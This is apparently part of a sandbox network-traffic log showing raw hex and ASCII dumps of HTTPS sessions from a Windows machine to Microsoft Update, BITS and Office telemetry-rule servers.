                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                                                                                                        Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        5192.168.2.549723184.28.90.27443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:24 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:24 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                        Server: ECAcc (lpl/EF70)
                                                                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                        X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=233767
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:24 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        X-CID: 2


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        6192.168.2.549720172.202.163.200443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:24 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Ts2XnfxeuFhKo77&MD=WfzzbFec HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:24 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                        MS-CorrelationId: 91cb73e2-5f26-4dff-90e6-3b1a1c4e10e0
                                                                                                                                                                                                                                                        MS-RequestId: 4688e565-a173-45f4-8cb1-fb495adfa2c7
                                                                                                                                                                                                                                                        MS-CV: +G7g07qsj0yjsfHm.0
                                                                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:23 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                                                                                        2024-11-20 23:49:24 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                        2024-11-20 23:49:24 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        7192.168.2.54973413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:25 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:26 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                        x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234926Z-178bfbc474btvfdfhC1NYCa2en00000000sg00000000ew1z
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        8192.168.2.54973313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:25 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:26 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                        x-ms-request-id: 884d2a23-a01e-00ab-5b8c-3a9106000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234926Z-1777c6cb754g9zd5hC1TEBfvpw0000000afg0000000078xp
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        9192.168.2.54973213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:25 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:26 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                        x-ms-request-id: 704ea499-801e-00ac-498c-3bfd65000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234926Z-r1d97b99577lxltfhC1TEByw2s00000009g000000000t52q
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        10192.168.2.54973513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:25 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:26 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                        x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234926Z-178bfbc474bmqmgjhC1NYCy16c00000000t000000000d26y
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        11192.168.2.54973613.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:25 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:26 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                        x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234926Z-178bfbc474bscnbchC1NYCe7eg00000000x0000000005pcf
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        12192.168.2.549738184.28.90.27443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        ApiVersion: Distribute 1.1
